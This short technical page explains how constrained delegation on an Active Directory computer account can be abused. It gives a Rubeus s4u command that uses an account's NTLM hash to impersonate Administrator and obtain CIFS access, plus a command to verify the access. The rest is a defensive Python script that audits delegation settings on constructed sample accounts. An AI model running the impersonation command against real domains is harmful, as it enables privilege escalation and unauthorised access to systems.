Constrained Delegation

The following example uses Rubeus to abuse constrained delegation configured on a computer account. The /altservice switch is optional.

Rubeus.exe s4u /user:COMPUTER$ /rc4:COMPUTER_NTLM_HASH /msdsspn:host/vulnerable.home.arpa /impersonateuser:Administrator /altservice:cifs /ptt

In the above example, CIFS access is requested and the resulting ticket is passed into the current session. Whether the access was granted can then be validated with the command dir \\vulnerable.home.arpa\C$
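
From the defender's side, the accounts this technique depends on can be found by auditing the msDS-AllowedToDelegateTo and userAccountControl attributes. The Python sketch below is an added example, not part of the original page or of Rubeus; it runs over a constructed account export, and the record layout and the privileged field are assumptions.

```python
# Audit a directory export for constrained delegation exposure.
# Record layout and the "privileged" field are assumptions; the data is constructed.
UF_NOT_DELEGATED = 0x100000  # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition allowed

ACCOUNTS = [  # constructed sample, mirrors the names used on this page
    {"sam": "COMPUTER$", "uac": 0x1000 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "delegate_to": ["host/vulnerable.home.arpa"], "privileged": False},
    {"sam": "WEB01$", "uac": 0x1000,
     "delegate_to": ["http/intranet.home.arpa:8080"], "privileged": False},
    {"sam": "Administrator", "uac": 0x200, "delegate_to": [], "privileged": True},
    {"sam": "svc-backup", "uac": 0x200 | UF_NOT_DELEGATED,
     "delegate_to": [], "privileged": True},
]


def spn_host(spn):
    """Return the lower-cased host part of 'class/host[:port][/name]'."""
    return spn.split("/")[1].split(":")[0].lower()


def delegation_findings(accounts):
    """Return (delegators, exposed_privileged) for a list of account records."""
    delegators = []
    for acct in accounts:
        spns = [s for s in acct["delegate_to"] if "/" in s]
        if not spns:
            continue
        delegators.append({
            "account": acct["sam"],
            # True: the account may act for a user who never authenticated to it.
            "protocol_transition": bool(acct["uac"] & UF_TRUSTED_TO_AUTH_FOR_DELEGATION),
            # Review per host, not per service class: /altservice above shows
            # that the class in a delegated ticket (host) can be swapped (cifs).
            "hosts": sorted({spn_host(s) for s in spns}),
        })
    # Privileged accounts without NOT_DELEGATED can be impersonated via delegation.
    exposed = [a["sam"] for a in accounts
               if a["privileged"] and not a["uac"] & UF_NOT_DELEGATED]
    return delegators, exposed


if __name__ == "__main__":
    delegators, exposed = delegation_findings(ACCOUNTS)
    for d in delegators:
        print(d)
    print("privileged accounts not marked sensitive:", exposed)
```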
